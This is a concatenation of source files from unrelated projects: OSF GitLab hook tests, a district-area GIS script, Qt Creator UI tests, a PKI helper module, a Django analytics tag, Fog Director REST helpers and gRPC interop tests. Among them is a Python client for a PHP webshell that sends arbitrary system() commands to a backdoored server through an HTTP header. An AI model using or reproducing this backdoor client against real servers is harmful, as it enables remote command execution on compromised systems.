url = node.web_url_for('addon_view_or_download_file', path=path, provider='gitlab')
expected_urls = {
'view': '{0}?branch={1}'.format(url, sha),
'download': '{0}?action=download&branch={1}'.format(url, sha)
}
assert_equal(urls['view'], expected_urls['view'])
assert_equal(urls['download'], expected_urls['download'])
@mock.patch('addons.gitlab.views.verify_hook_signature')
@mock.patch('addons.gitlab.api.GitLabClient.repo')
def test_hook_callback_add_file_not_thro_osf(self, mock_repo, mock_verify):
gitlab_mock = self.gitlab
gitlab_mock.repo = mock_repo
url = '/api/v1/project/{0}/gitlab/hook/'.format(self.project._id)
timestamp = str(datetime.datetime.utcnow())
self.app.post_json(
url,
{
'test': True,
'commits': [{
'id': 'b08dbb5b6fcd74a592e5281c9d28e2020a1db4ce',
'distinct': True,
'message': 'foo',
'timestamp': timestamp,
'url': 'https://gitlab.com/tester/addontesting/commit/b08dbb5b6fcd74a592e5281c9d28e2020a1db4ce',
'author': {'name': 'Illidan', 'email': 'njqpw@osf.io'},
'committer': {'name': 'Testor', 'email': 'test@osf.io', 'username': 'tester'},
'added': ['PRJWN3TV'],
'removed': [],
'modified': [],
}]
},
content_type='application/json',
).maybe_follow()
self.project.reload()
assert_equal(self.project.logs.latest().action, 'gitlab_file_added')
urls = self.project.logs.latest().params['urls']
self.check_hook_urls(
urls,
self.project,
path='PRJWN3TV',
sha='b08dbb5b6fcd74a592e5281c9d28e2020a1db4ce',
)
@mock.patch('addons.gitlab.views.verify_hook_signature')
def test_hook_callback_modify_file_not_thro_osf(self, mock_verify):
url = '/api/v1/project/{0}/gitlab/hook/'.format(self.project._id)
timestamp = str(datetime.datetime.utcnow())
self.app.post_json(
url,
{'test': True,
'commits': [{'id': 'b08dbb5b6fcd74a592e5281c9d28e2020a1db4ce',
'distinct': True,
'message': ' foo',
'timestamp': timestamp,
'url': 'https://gitlab.com/tester/addontesting/commit/b08dbb5b6fcd74a592e5281c9d28e2020a1db4ce',
'author': {'name': 'Illidan', 'email': 'njqpw@osf.io'},
'committer': {'name': 'Testor', 'email': 'test@osf.io',
'username': 'tester'},
'added': [], 'removed':[], 'modified':['PRJWN3TV']}]},
content_type='application/json').maybe_follow()
self.project.reload()
assert_equal(self.project.logs.latest().action, 'gitlab_file_updated')
urls = self.project.logs.latest().params['urls']
self.check_hook_urls(
urls,
self.project,
path='PRJWN3TV',
sha='b08dbb5b6fcd74a592e5281c9d28e2020a1db4ce',
)
@mock.patch('addons.gitlab.views.verify_hook_signature')
def test_hook_callback_remove_file_not_thro_osf(self, mock_verify):
url = '/api/v1/project/{0}/gitlab/hook/'.format(self.project._id)
timestamp = str(datetime.datetime.utcnow())
self.app.post_json(
url,
{'test': True,
'commits': [{'id': 'b08dbb5b6fcd74a592e5281c9d28e2020a1db4ce',
'distinct': True,
'message': 'foo',
'timestamp': timestamp,
'url': 'https://gitlab.com/tester/addontesting/commit/b08dbb5b6fcd74a592e5281c9d28e2020a1db4ce',
'author': {'name': 'Illidan', 'email': 'njqpw@osf.io'},
'committer': {'name': 'Testor', 'email': 'test@osf.io', 'username': 'tester'},
'added': [], 'removed': ['PRJWN3TV'], 'modified':[]}]},
content_type='application/json').maybe_follow()
self.project.reload()
assert_equal(self.project.logs.latest().action, 'gitlab_file_removed')
urls = self.project.logs.latest().params['urls']
assert_equal(urls, {})
@mock.patch('addons.gitlab.views.verify_hook_signature')
def test_hook_callback_add_file_thro_osf(self, mock_verify):
url = '/api/v1/project/{0}/gitlab/hook/'.format(self.project._id)
self.app.post_json(
url,
{'test': True,
'commits': [{'id': 'b08dbb5b6fcd74a592e5281c9d28e2020a1db4ce',
'distinct': True,
'message': 'Added via the Open Science Framework',
'timestamp': '2014-01-08T14:15:51-08:00',
'url': 'https://gitlab.com/tester/addontesting/commit/b08dbb5b6fcd74a592e5281c9d28e2020a1db4ce',
'author': {'name': 'Illidan', 'email': 'njqpw@osf.io'},
'committer': {'name': 'Testor', 'email': 'test@osf.io', 'username': 'tester'},
'added': ['PRJWN3TV'], 'removed':[], 'modified':[]}]},
content_type='application/json').maybe_follow()
self.project.reload()
assert_not_equal(self.project.logs.latest().action, 'gitlab_file_added')
@mock.patch('addons.gitlab.views.verify_hook_signature')
def test_hook_callback_modify_file_thro_osf(self, mock_verify):
url = '/api/v1/project/{0}/gitlab/hook/'.format(self.project._id)
self.app.post_json(
url,
{'test': True,
'commits': [{'id': 'b08dbb5b6fcd74a592e5281c9d28e2020a1db4ce',
'distinct': True,
'message': 'Updated via the Open Science Framework',
'timestamp': '2014-01-08T14:15:51-08:00',
'url': 'https://gitlab.com/tester/addontesting/commit/b08dbb5b6fcd74a592e5281c9d28e2020a1db4ce',
'author': {'name': 'Illidan', 'email': 'njqpw@osf.io'},
'committer': {'name': 'Testor', 'email': 'test@osf.io', 'username': 'tester'},
'added': [], 'removed':[], 'modified':['PRJWN3TV']}]},
content_type='application/json').maybe_follow()
self.project.reload()
assert_not_equal(self.project.logs.latest().action, 'gitlab_file_updated')
@mock.patch('addons.gitlab.views.verify_hook_signature')
def test_hook_callback_remove_file_thro_osf(self, mock_verify):
url = '/api/v1/project/{0}/gitlab/hook/'.format(self.project._id)
self.app.post_json(
url,
{'test': True,
'commits': [{'id': 'b08dbb5b6fcd74a592e5281c9d28e2020a1db4ce',
'distinct': True,
'message': 'Deleted via the Open Science Framework',
'timestamp': '2014-01-08T14:15:51-08:00',
'url': 'https://gitlab.com/tester/addontesting/commit/b08dbb5b6fcd74a592e5281c9d28e2020a1db4ce',
'author': {'name': 'Illidan', 'email': 'njqpw@osf.io'},
'committer': {'name': 'Testor', 'email': 'test@osf.io', 'username': 'tester'},
'added': [], 'removed':['PRJWN3TV'], 'modified':[]}]},
content_type='application/json').maybe_follow()
self.project.reload()
assert_not_equal(self.project.logs.latest().action, 'gitlab_file_removed')
class TestRegistrationsWithGitLab(OsfTestCase):
def setUp(self):
super(TestRegistrationsWithGitLab, self).setUp()
self.project = ProjectFactory.build()
self.project.save()
self.consolidated_auth = Auth(user=self.project.creator)
self.project.add_addon('gitlab', auth=self.consolidated_auth)
self.project.creator.add_addon('gitlab')
self.node_settings = self.project.get_addon('gitlab')
self.user_settings = self.project.creator.get_addon('gitlab')
self.node_settings.user_settings = self.user_settings
self.node_settings.user = 'Queen'
self.node_settings.repo = 'Sheer-Heart-Attack'
self.node_settings.save()
class TestGitLabSettings(OsfTestCase):
def setUp(self):
super(TestGitLabSettings, self).setUp()
self.gitlab = create_mock_gitlab(user='fred', private=False)
self.project = ProjectFactory()
self.auth = self.project.creator.auth
self.consolidated_auth = Auth(user=self.project.creator)
self.project.add_addon('gitlab', auth=self.consolidated_auth)
self.project.creator.add_addon('gitlab')
self.node_settings = self.project.get_addon('gitlab')
self.user_settings = self.project.creator.get_addon('gitlab')
self.node_settings.user_settings = self.user_settings
self.node_settings.user = 'Queen'
self.node_settings.repo = 'Sheer-Heart-Attack'
self.node_settings.repo_id = 'sheer-heart-attack'
self.node_settings.save()
@mock.patch('addons.gitlab.models.NodeSettings.add_hook')
@mock.patch('addons.gitlab.api.GitLabClient.repo')
def test_link_repo(self, mock_repo, mock_add_hook):
gitlab_mock = self.gitlab
mock_repo.return_value = gitlab_mock.repo.return_value
url = self.project.api_url + 'gitlab/settings/'
self.app.post_json(
url,
{
'gitlab_user': 'queen',
'gitlab_repo': 'night at the opera',
'gitlab_repo_id': 'abc',
},
auth=self.auth
).maybe_follow()
self.project.reload()
self.node_settings.reload()
assert_equal(self.node_settings.user, 'queen')
assert_equal(self.node_settings.repo, 'night at the opera')
assert_equal(self.project.logs.latest().action, 'gitlab_repo_linked')
mock_add_hook.assert_called_once_with(save=False)
@mock.patch('addons.gitlab.models.NodeSettings.add_hook')
@mock.patch('addons.gitlab.api.GitLabClient.repo')
def test_link_repo_no_change(self, mock_repo, mock_add_hook):
gitlab_mock = self.gitlab
mock_repo.return_value = gitlab_mock.repo.return_value
log_count = self.project.logs.count()
url = self.project.api_url + 'gitlab/settings/'
self.app.post_json(
url,
{
'gitlab_user': self.node_settings.user,
'gitlab_repo': self.node_settings.repo,
'gitlab_repo_id': self.node_settings.repo_id,
},
auth=self.auth
).maybe_follow()
self.project.reload()
self.node_settings.reload()
assert_equal(self.project.logs.count(), log_count)
assert_false(mock_add_hook.called)
@mock.patch('addons.gitlab.api.GitLabClient.repo')
def test_link_repo_non_existent(self, mock_repo):
mock_repo.return_value = None
url = self.project.api_url + 'gitlab/settings/'
res = self.app.post_json(
url,
{
'gitlab_user': 'queen',
'gitlab_repo': 'night at the opera',
},
auth=self.auth,
expect_errors=True
).maybe_follow()
assert_equal(res.status_code, 400)
@mock.patch('addons.gitlab.api.GitLabClient.branches')
def test_link_repo_registration(self, mock_branches):
mock_branches.return_value = [
Branch.from_json(dumps({
'name': 'master',
'commit': {
'sha': '6dcb09b5b57875f334f61aebed695e2e4193db5e',
'url': 'https://api.gitlab.com/repos/octocat/Hello-World/commits/c5b97d5ae6c19d5c5df71a34c7fbeeda2479ccbc',
}
})),
Branch.from_json(dumps({
'name': 'develop',
'commit': {
'sha': '6dcb09b5b57875asdasedawedawedwedaewdwdass',
'url': 'https://api.gitlab.com/repos/octocat/Hello-World/commits/cdcb09b5b57875asdasedawedawedwedaewdwdass',
}
}))
]
registration = self.project.register_node(
schema=get_default_metaschema(),
auth=self.consolidated_auth,
draft_registration=DraftRegistrationFactory(branched_from=self.project)
)
url = registration.api_url + 'gitlab/settings/'
res = self.app.post_json(
url,
{
'gitlab_user': 'queen',
'gitlab_repo': 'night at the opera',
},
auth=self.auth,
expect_errors=True
).maybe_follow()
assert_equal(res.status_code, 400)
@mock.patch('addons.gitlab.models.NodeSettings.delete_hook')
def test_deauthorize(self, mock_delete_hook):
url = self.project.api_url + 'gitlab/user_auth/'
self.app.delete(url, auth=self.auth).maybe_follow()
self.project.reload()
self.node_settings.reload()
assert_equal(self.node_settings.user, None)
assert_equal(self.node_settings.repo, None)
assert_equal(self.node_settings.user_settings, None)
assert_equal(self.project.logs.latest().action, 'gitlab_node_deauthorized')
if __name__ == '__main__':
unittest.main()
| apache-2.0 |
mjharriso/ConDistAreas | ConDistAreas.py | 1 | 4102 | #Coded by Matthew Harrison, July, 2015.
#Read ESRI shapefiles and calculate district areas
#Using Albers Equal Area Projection for North America
#Including Alaska and Hawaii
from mpl_toolkits.basemap import Basemap
from pyproj import Proj
from shapely.geometry import LineString, Point, shape
import fiona
from fiona import collection
import numpy as np
import pandas
import argparse
#Shapefiles should have been downladed from
#http://cdmaps.polisci.ucla.edu/
#and unzipped in the current directory.
#for con in np.arange(106,114):
for con in [114]:
fnam='districtShapes/districts'+str(con)+'.shp'
print fnam
districts=fiona.open(fnam)
lat1=districts.bounds[1]
lat2=districts.bounds[3]
m = Proj(proj='aea',lat_1=lat1,lat_2=lat2,lat_0=np.mean((lat1,lat2)))
Districts=[]
for pol in fiona.open(fnam):
if pol['geometry'] is None:
print 'Bad polygon',pol['properties']
continue
# Polygons
coords=pol['geometry']['coordinates']
if pol['geometry']['type'] == 'Polygon':
lons=[];lats=[]
for c in coords[0]:
lons.append(c[0])
lats.append(c[1])
try:
x,y=m(lons,lats)
except:
print pol['properties']
print pol['geometry']['type']
raise
poly={'type':'Polygon','coordinates':[zip(x,y)]}
center=shape(poly).centroid
ccoords= shape(center).coords[:][0]
xc=ccoords[0];yc=ccoords[1]
lonc,latc=m(xc,yc,inverse=True,radians=False)
Districts.append({'STATENAME':pol['properties']['STATENAME'],
'DISTRICT':pol['properties']['DISTRICT'],
'COUNTY':pol['properties']['COUNTY'],
'ID':pol['properties']['ID'],'area':shape(poly).area,'centroid':[lonc,latc]})
# print shape(poly).centroid
elif pol['geometry']['type'] == 'MultiPolygon':
# Multiple Polygons
for p in coords:
lons=[];lats=[]
for c in p[0]:
lons.append(c[0])
lats.append(c[1])
try:
x,y=m(lons,lats)
except:
print pol['properties']
print pol['geometry']['type']
raise
poly={'type':'Polygon','coordinates':[zip(x,y)]}
center=shape(poly).centroid
ccoords= shape(center).coords[:][0]
xc=ccoords[0];yc=ccoords[1]
lonc,latc=m(xc,yc,inverse=True,radians=False)
Districts.append({'STATENAME':pol['properties']['STATENAME'],
'DISTRICT':pol['properties']['DISTRICT'],
'COUNTY':pol['properties']['COUNTY'],
'ID':pol['properties']['ID'],'area':shape(poly).area,'centroid':[lonc,latc]})
# print shape(poly).centroid.wkt
Districts=sorted(Districts,key=lambda d:(d['STATENAME'],int(d['DISTRICT'])))
# Write Areas to csv
filenam='areas'+str(con)+'.txt'
f=open(filenam,'w')
pr=None
for d in Districts:
if pr is not None:
if d['STATENAME'] != pr['STATENAME']:
print d['STATENAME']
if d['DISTRICT']==pr['DISTRICT']:
a=a+d['area']
center.append(d['centroid'])
else:
line=pr['ID'],pr['DISTRICT'],'area='+str(a/1.e6),pr['STATENAME']+'\n'
f.write(','.join(line))
line=pr['ID'],pr['DISTRICT'],'centroid='+str(center)+'\n'
f.write(','.join(line))
a=d['area']
center=[d['centroid']]
pr=d.copy()
else:
pr=d.copy()
a=d['area']
center=[d['centroid']]
line=pr['ID'],pr['DISTRICT'],'area='+str(a/1.e6),pr['STATENAME']+'\n'
f.write(','.join(line))
line=pr['ID'],pr['DISTRICT'],'centroid='+str(center)+'\n'
f.write(','.join(line))
f.close()
| gpl-2.0 |
kuba1/qtcreator | tests/system/suite_editors/tst_basic_cpp_support/test.py | 6 | 6126 | #############################################################################
##
## Copyright (C) 2015 The Qt Company Ltd.
## Contact: http://www.qt.io/licensing
##
## This file is part of Qt Creator.
##
## Commercial License Usage
## Licensees holding valid commercial Qt licenses may use this file in
## accordance with the commercial license agreement provided with the
## Software or, alternatively, in accordance with the terms contained in
## a written agreement between you and The Qt Company. For licensing terms and
## conditions see http://www.qt.io/terms-conditions. For further information
## use the contact form at http://www.qt.io/contact-us.
##
## GNU Lesser General Public License Usage
## Alternatively, this file may be used under the terms of the GNU Lesser
## General Public License version 2.1 or version 3 as published by the Free
## Software Foundation and appearing in the file LICENSE.LGPLv21 and
## LICENSE.LGPLv3 included in the packaging of this file. Please review the
## following information to ensure the GNU Lesser General Public License
## requirements will be met: https://www.gnu.org/licenses/lgpl.html and
## http://www.gnu.org/licenses/old-licenses/lgpl-2.1.html.
##
## In addition, as a special exception, The Qt Company gives you certain additional
## rights. These rights are described in The Qt Company LGPL Exception
## version 1.1, included in the file LGPL_EXCEPTION.txt in this package.
##
#############################################################################
source("../../shared/qtcreator.py")
def main():
projectDir = os.path.join(srcPath, "creator", "tests", "manual", "cplusplus-tools")
proFileName = "cplusplus-tools.pro"
if not neededFilePresent(os.path.join(projectDir, proFileName)):
return
# copy example project to temp directory
tempDir = prepareTemplate(projectDir)
if not tempDir:
return
# make sure the .user files are gone
proFile = os.path.join(tempDir, proFileName)
cleanUpUserFiles(proFile)
startApplication("qtcreator" + SettingsPath)
if not startedWithoutPluginError():
return
openQmakeProject(proFile)
progressBarWait(20000)
selectFromLocator("dummy.cpp")
## Waiting for a solution from Froglogic to make the below work.
## There is an issue with slots that return a class type that wasn't running previously...
# editorManager = waitForObject("{type='Core::EditorManager'}", 2000)
# t2 = editorManager.currentEditor()
# t3 = t2.file()
# t4 = t3.fileName
# test.compare(editorManager.currentEditor().file().fileName, "base.cpp")
cppwindow = waitForObject(":Qt Creator_CppEditor::Internal::CPPEditorWidget")
# - Move the cursor to the usage of a variable.
# - Press F2 or select from the menu: Tools / C++ / Follow Symbol under Cursor
# Creator will show you the declaration of the variable.
type(cppwindow, "<Ctrl+f>")
type(waitForObject(":*Qt Creator.findEdit_Utils::FilterLineEdit"), " xi")
type(waitForObject(":*Qt Creator.findEdit_Utils::FilterLineEdit"), "<Return>")
__typeAndWaitForAction__(cppwindow, "<F2>")
test.compare(lineUnderCursor(waitForObject(":Qt Creator_CppEditor::Internal::CPPEditorWidget")), "extern int xi;")
# - Move the cursor to a function call.
# - Press F2 or select from the menu: Tools / C++ / Follow Symbol under Cursor
# Creator will show you the definition of the function.
type(cppwindow, "<Ctrl+f>")
clickButton(waitForObject(":*Qt Creator_Utils::IconButton"))
type(waitForObject(":*Qt Creator.findEdit_Utils::FilterLineEdit"), "freefunc2")
type(waitForObject(":*Qt Creator.findEdit_Utils::FilterLineEdit"), "<Return>")
__typeAndWaitForAction__(cppwindow, "<F2>")
test.compare(lineUnderCursor(waitForObject(":Qt Creator_CppEditor::Internal::CPPEditorWidget")), "int freefunc2(double)")
# - Move the cursor to a function declaration
# - Press Shift+F2 or select from menu: Tools / C++ / Switch Between Method Declaration/Definition
# Creator should show the definition of this function
# - Press Shift+F2 or select from menu: Tools / C++ / Switch Between Method Declaration/Definition again
# Creator should show the declaration of the function again.
selectFromLocator("dummy.cpp")
mainWin = findObject(":Qt Creator_Core::Internal::MainWindow")
if not waitFor("'dummy.cpp ' in str(mainWin.windowTitle) and ' - cplusplus-tools - ' in str(mainWin.windowTitle)", 5000):
test.warning("Opening dummy.cpp seems to have failed")
# Reset cursor to the start of the document
if platform.system() == 'Darwin':
type(cppwindow, "<Home>")
else:
type(cppwindow, "<Ctrl+Home>")
type(cppwindow, "<Ctrl+f>")
clickButton(waitForObject(":*Qt Creator_Utils::IconButton"))
type(waitForObject(":*Qt Creator.findEdit_Utils::FilterLineEdit"), "Dummy::Dummy")
# Take us to the second instance
type(waitForObject(":*Qt Creator.findEdit_Utils::FilterLineEdit"), "<Return>")
cppwindow = waitForObject(":Qt Creator_CppEditor::Internal::CPPEditorWidget")
__typeAndWaitForAction__(cppwindow, "<Shift+F2>")
test.compare(lineUnderCursor(findObject(":Qt Creator_CppEditor::Internal::CPPEditorWidget")), " Dummy(int a);")
cppwindow = waitForObject(":Qt Creator_CppEditor::Internal::CPPEditorWidget")
snooze(2)
__typeAndWaitForAction__(cppwindow, "<Shift+F2>")
test.compare(lineUnderCursor(findObject(":Qt Creator_CppEditor::Internal::CPPEditorWidget")), "Dummy::Dummy(int)")
invokeMenuItem("File", "Exit")
def __typeAndWaitForAction__(editor, keyCombination):
origTxt = str(editor.plainText)
cursorPos = editor.textCursor().position()
type(editor, keyCombination)
if not waitFor("cppEditorPositionChanged(cursorPos) or origTxt != str(editor.plainText)", 2000):
test.warning("Waiting timed out...")
def cppEditorPositionChanged(origPos):
try:
editor = waitForObject(":Qt Creator_CppEditor::Internal::CPPEditorWidget", 500)
return editor.textCursor().position() != origPos
except:
return False
| lgpl-2.1 |
MumbleFysh/vinty | packages/pki/util.py | 3 | 6819 | #!/usr/bin/python
## Revision history ############################################################
__author__ = 'Wouter Eerdekens <info@fks.be>'
__date__ = '2011-08-12'
__version__ = 0.1
__history__ = """
2011-08-12 - Prepare for initial release <jeroen.hooyberghs@fks.be>
2006-07-26 - initial version.
"""
################################################################################
## Imports #####################################################################
import commands, os, re, sets, stat, string, sys, tempfile, zipfile
import pki
from ConfigParser import ConfigParser
from os import path
## Functions ###################################################################
def parse_config():
configFile = '/etc/vinty/vinty.cfg'
try:
cp = ConfigParser()
cp.readfp(open(configFile))
except:
cp = None
else:
if not test_config(cp):
cp = None
return cp
# ------------------------------------------------------------------------------
def test_config(config):
# -- Dictionary containing expected configuration sections and options
cfg = { 'openssl' : ('path', 'conf'),
'keys' : ('path', 'path_revoked', 'size', 'expire', 'country',
'province', 'city', 'org', 'ou', 'email'),
'ca' : ('name', 'expire', 'crl')
}
rv = True
for section in cfg.keys():
if not config.has_section(section):
rv = False
else:
for option in cfg[section]:
if not config.has_option(section, option):
rv = False
elif not config.get(section,option) and option != 'ou':
rv = False
return rv
# ------------------------------------------------------------------------------
def check_permissions(file):
if path.isfile(file) \
and oct(os.stat(file)[stat.ST_MODE] & 0777) in ('0400','0600'):
rv = True
else:
rv = False
return rv
# ------------------------------------------------------------------------------
def is_private_key(file):
if path.isfile(file):
exp = re.compile('BEGIN RSA PRIVATE KEY', re.MULTILINE)
result = exp.search(open(file).read())
if result:
rv = True
else:
rv = False
else:
rv = False
return rv
# ------------------------------------------------------------------------------
def is_encrypted(file):
if path.isfile(file):
exp = re.compile('^Proc-Type: 4,ENCRYPTED', re.MULTILINE)
result = exp.search(open(file).read())
if result:
rv = True
else:
rv = False
else:
rv = False
return rv
# ------------------------------------------------------------------------------
def strip_invalid(cn):
all = ''.join(map(chr, range(256)))
valid = string.lowercase + string.digits + '._-'
valid = ''.join(sets.Set(all).difference(valid))
cn = cn.lower().translate(all, valid)
return cn
# ------------------------------------------------------------------------------
def move_revoked(config, filelist, serial):
destDir = path.join(config.get('keys', 'path_revoked'), serial)
try:
os.makedirs(destDir, 0700)
for file in filelist:
dest = path.join(destDir, os.path.basename(file))
os.rename(file, dest)
except:
rv = False
else:
rv = True
return rv
# ------------------------------------------------------------------------------
def serial_from_cn(config, cn):
serial = None
keyDir = config.get('keys', 'path')
crtFile = path.join(keyDir, cn + '.crt')
if path.isfile(crtFile):
exp = re.compile('(^.*Serial Number:)(.*[0-9]+.*)(\(.*\)$)', re.MULTILINE)
result = exp.search(open(crtFile).read())
if result and len(result.groups()) == 3:
serial = hex(int(result.group(2).strip()))[2:].upper()
if len(serial) % 2:
serial = '0' + serial
return serial
# ------------------------------------------------------------------------------
def cert_type(config, serial, status):
if status == pki.CERT_VALID:
keyDir = config.get('keys', 'path')
pemFile = path.join(keyDir, serial + '.pem')
else:
revDir = config.get('keys', 'path_revoked')
pemFile = path.join(path.join(revDir, serial), serial + '.pem')
if path.isfile(pemFile):
exp = re.compile('.*SSL Server$', re.MULTILINE)
result = exp.search(open(pemFile).read())
if result:
rv = pki.CERT_SERVER
else:
rv = pki.CERT_CLIENT
else:
rv = None
return rv
# ------------------------------------------------------------------------------
def cert_files(config, cn, serial, download = False):
keyDir = config.get('keys', 'path')
files = []
rv = None
if serial:
if download:
files.append(path.join(keyDir, cn + '.crt'))
files.append(path.join(keyDir, cn + '.key'))
files.append(path.join(keyDir, config.get('ca', 'name') + '.crt'))
if cert_type(config, serial, pki.CERT_VALID) == pki.CERT_SERVER:
keySize = config.get('keys', 'size')
files.append(path.join(keyDir, 'dh' + keySize + '.pem'))
else:
files.append(path.join(keyDir, cn + '.csr'))
files.append(path.join(keyDir, cn + '.crt'))
files.append(path.join(keyDir, cn + '.key'))
files.append(path.join(keyDir, serial + '.pem'))
for file in files:
if not path.isfile(file):
break
else:
rv = files
return rv
# ------------------------------------------------------------------------------
def create_ssl_script(config, cn = ''):
try:
fd, fname = tempfile.mkstemp()
os.write(fd, """#!/bin/bash
export KEY_DIR="%(dir)s"
export KEY_CN="%(cn)s"
export KEY_SIZE="%(size)s"
export KEY_EXPIRE="%(expire)s"
export KEY_COUNTRY="%(country)s"
export KEY_PROVINCE="%(province)s"
export KEY_CITY="%(city)s"
export KEY_ORG="%(org)s"
export KEY_OU="%(ou)s"
export KEY_EMAIL="%(email)s"
""" % { 'dir' : config.get('keys', 'path'),
'cn' : cn,
'size' : config.get('keys', 'size'),
'expire' : config.get('keys', 'expire'),
'country' : config.get('keys', 'country'),
'province' : config.get('keys', 'province'),
'city' : config.get('keys', 'city'),
'org' : config.get('keys', 'org'),
'ou' : config.get('keys', 'ou'),
'email' : config.get('keys', 'email')
})
except:
fd = None
fname = None
return fd, fname
# ------------------------------------------------------------------------------
def run_ssl_script(script):
os.chmod(script, 0700)
status, output = commands.getstatusoutput(script)
os.remove(script)
return not status, output
| gpl-2.0 |
clintecker/django-google-analytics | google_analytics/templatetags/analytics.py | 3 | 2204 | from django import template
from django.conf import settings
from django.db import models
from django.contrib.sites.models import Site
from django.template import Context, loader
register = template.Library()
Analytics = models.get_model('googleanalytics', 'analytics')
def do_get_analytics(parser, token):
contents = token.split_contents()
tag_name = contents[0]
template_name = 'google_analytics/%s_template.html' % tag_name
if len(contents) == 2:
# split_contents() knows not to split quoted strings.
code = contents[1]
elif len(contents) == 1:
code = None
else:
raise template.TemplateSyntaxError, "%r cannot take more than one argument" % tag_name
if not code:
current_site = Site.objects.get_current()
else:
if not (code[0] == code[-1] and code[0] in ('"', "'")):
raise template.TemplateSyntaxError, "%r tag's argument should be in quotes" % tag_name
code = code[1:-1]
current_site = None
return AnalyticsNode(current_site, code, template_name)
class AnalyticsNode(template.Node):
def __init__(self, site=None, code=None, template_name='google_analytics/analytics_template.html'):
self.site = site
self.code = code
self.template_name = template_name
def render(self, context):
content = ''
if self.site:
code_set = self.site.analytics_set.all()
if code_set:
code = code_set[0].analytics_code
else:
return ''
elif self.code:
code = self.code
else:
return ''
if code.strip() != '':
t = loader.get_template(self.template_name)
c = Context({
'analytics_code': code,
'track_page_load_time': getattr(settings,
"GOOGLE_ANALYTICS_TRACK_PAGE_LOAD_TIME",
False),
})
return t.render(c)
else:
return ''
register.tag('analytics', do_get_analytics)
register.tag('analytics_async', do_get_analytics)
| mit |
DevOps4Networks/iox-utils | fog-director-utils/src/iox_fog_dir_rest/functions.py | 1 | 2610 | #! /usr/bin/env python
# encoding: utf-8
"""
Copyright 2016 Nathan John Sowatskey
These are sample functions for the Cisco Fog Director REST API.
See:
http://www.cisco.com/c/en/us/td/docs/routers/access/800/software/guides/iox/fog-director/reference-guide/1-0/fog_director_ref_guide.html
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import requests
import settings
import logging
from logging.config import fileConfig
fileConfig('../etc/logging_config.ini')
logger = logging.getLogger()
def get_token():
response = requests.post(settings.url_base + 'tokenservice',
auth=(settings.user_name, settings.password),
verify=False)
if response.status_code == 202:
return response.json()['token']
else:
logger.error("Response code was - " + response.status_code + " in get_token()")
return None
def get_devices(limit=10, offset=0):
#The limit default seems to be 10
token = get_token()
headers = {'x-token-id':token}
function_part = "devices" + '?limit=' + str(limit) +'&offset=' + str(offset)
response = requests.get(settings.url_base + function_part, headers=headers,
verify=settings.verify)
token = ""
if response.status_code == 200:
return response.json()
else:
logger.error("Response code was - " + str(response.status_code) + " in get_devices()")
return None
def delete_device(deviceId):
token = get_token()
headers = {'x-token-id':token}
response = requests.delete(settings.url_base + 'devices/' + deviceId, headers=headers,
verify=settings.verify)
token = ""
return response.status_code
def add_devices_from_file(filename):
token = get_token()
headers = {'x-token-id':token}
files = {'file': open(filename, 'rb')}
response = requests.post(settings.url_base + 'devices/import', headers=headers, files=files,
verify=settings.verify)
token = ""
return response.status_code | apache-2.0 |
simonkuang/grpc | src/python/grpcio_tests/tests/interop/_intraop_test_case.py | 27 | 1865 | # Copyright 2015 gRPC authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Common code for unit tests of the interoperability test code."""
from tests.interop import methods
class IntraopTestCase(object):
"""Unit test methods.
This class must be mixed in with unittest.TestCase and a class that defines
setUp and tearDown methods that manage a stub attribute.
"""
def testEmptyUnary(self):
methods.TestCase.EMPTY_UNARY.test_interoperability(self.stub, None)
def testLargeUnary(self):
methods.TestCase.LARGE_UNARY.test_interoperability(self.stub, None)
def testServerStreaming(self):
methods.TestCase.SERVER_STREAMING.test_interoperability(self.stub, None)
def testClientStreaming(self):
methods.TestCase.CLIENT_STREAMING.test_interoperability(self.stub, None)
def testPingPong(self):
methods.TestCase.PING_PONG.test_interoperability(self.stub, None)
def testCancelAfterBegin(self):
methods.TestCase.CANCEL_AFTER_BEGIN.test_interoperability(
self.stub, None)
def testCancelAfterFirstResponse(self):
methods.TestCase.CANCEL_AFTER_FIRST_RESPONSE.test_interoperability(
self.stub, None)
def testTimeoutOnSleepingServer(self):
methods.TestCase.TIMEOUT_ON_SLEEPING_SERVER.test_interoperability(
self.stub, None)
| apache-2.0 |
akamajoris/webshell | php/php-sh/client.py | 26 | 1279 | #!/usr/bin/python
# Client for the backdoor which
# uses HTTP CODE header for inserting code
# Got the idea after seeing this sort of payload
# dropped by a phpmyadmin exploit on rdot :)
# Is also good to learn how to use urllib
# and not be lazy arse with requests all of time!
# Insecurety Research (2013) - insecurety.net
import urllib2
import sys
def usage(program):
print "HTTP CODE Header Backdoor Command Shell"
print "Usage: %s <Backdoor URL>" %(program)
print "Example: %s http://www.test.com/webshell.php" %(program)
sys.exit(0)
def main(args):
try:
if len(args) < 2:
usage(args[0])
print "[+] Using %s as target" %(args[1])
print "[!] Popping a shell, type 'exit' to quit"
while True:
opener = urllib2.build_opener()
url = args[1]
cmd = raw_input('~$ ')
if cmd == "exit":
sys.exit(0)
else:
code = "system('%s');" %(cmd)
opener.addheaders.append(('Code', code))# %(str(code))
urllib2.install_opener(opener)
result = urllib2.urlopen(url).read()
print result
except Exception, e:
print e
if __name__ == "__main__":
main(sys.argv)
| gpl-3.0 |
vismantic-ohtuprojekti/qualipy | qualipy/filters/svm_filter.py | 2 | 2714 | import os.path
import numpy
from filter import Filter
from ..utils.svm import SVM
class SVMFilter(Filter):
"""An abstract class representing a filter that uses SVM"""
def __init__(self, threshold, invert_threshold, svm_file):
super(SVMFilter, self).__init__(threshold, invert_threshold)
if not (isinstance(svm_file, str) or
isinstance(svm_file, unicode)):
raise TypeError("svm_file should be a string")
self.svm = SVM()
self.load(svm_file)
def train(self, images, labels, save_path, read_image,
get_input_vector):
"""Train an SVM-based filter
:param images: list of file paths to images
:type images: list
:param labels: list of labels for the corresponding images, every
label should be either 0 or 1
:type labels: list
